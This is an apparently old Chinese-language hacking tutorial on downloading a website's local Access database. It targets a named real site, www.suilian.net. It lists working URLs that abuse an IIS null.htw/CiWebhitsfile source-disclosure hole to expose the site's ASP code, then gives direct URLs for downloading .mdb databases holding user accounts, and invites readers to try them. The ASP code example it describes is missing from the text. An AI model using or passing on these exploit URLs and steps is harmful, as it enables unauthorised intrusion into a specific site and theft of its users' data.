一般的web server都要使用數據庫來存儲信息,幾乎所有的網站都要用數據庫。這樣就存在著兩種可能,一種是使用小型數據庫,如aceess,一般就儲存在本地。另一種是使用大型數據庫,如SQL server,Oracle這時候一般就放在另一臺機器上,然后通過ODBC來訪問它。
由于頁面經常需要查詢各種信息,修改用戶信息等操作,實質上就是和數據庫打交道了。這樣就給非法用戶留下利用的機會了。
對本地數據庫的攻擊。
對本地數據庫的攻擊一種方法就是下載數據庫,然后呢,你就可以打開這個數據庫得到內部的用戶和帳號了,以及其它有用的信息。
下面以“水蓮會”為例:
經過掃描,得知www.suilian.net使用的是虛擬主機,使用的是WIndows NT+IIS4.0.掃描器你可以使用twwwscan或者其它,其實功能都大同小異。
在對IIS攻擊時如果能夠看到ASP源代碼,那么成功的可能性就很大了。
經過測試,發現此站點存在源代碼暴露漏洞。。。
大家可以試試:
http://www.suilian.net/null.htw?CiWebhitsfile=/maillist.asp%20&CiRestriction=none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/index.asp%20&CiRestriction=none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/DetNew.asp%20&CiRestriction=none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/detail.asp%20&CiRestriction=none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/topic4.asp%20&CiRestriction=none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlefrm.asp%20&CiRestriction=none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlenew.asp%20&CiRestriction=none&CiHiliteType=full
看見了什么?
當然源代碼泄露的漏洞有很多種,這里就不一一列舉,你可以去查漏洞手冊。
現在你就可以去查看ASP源代碼了。
如果你對ASP不熟悉,我簡單介紹一下(其實佳佳也不熟悉)。
ASP是嵌在之間。一般使用VBScript或者JavaScript書寫代碼。
看這個例子使用VBScript書寫的:
這是一個典型的與數據庫連接的代碼。
依次的步驟為:
建立連接對象,
設置數據庫路徑,
打開數據庫,
設置記錄對象,
取記錄。
這里我們就可以知道數據庫的類型,名稱和路徑,這里是在當前目錄下。
還可以知道數據庫的表名和字段名稱。
有經驗的程序員一般不會把數據庫名直接放在代碼里,而是在ODBC里設置數據源,以增加安全性。
然后就發現存在
d:Ssuilianchatnews.mdb
d:Ssuiliantopic22.mdb等數據庫
你只要使用
http://www.suilian.net/chat/news.mdb
http://www.suilian.net/topic22.mdb
就可以把它下載下來。。。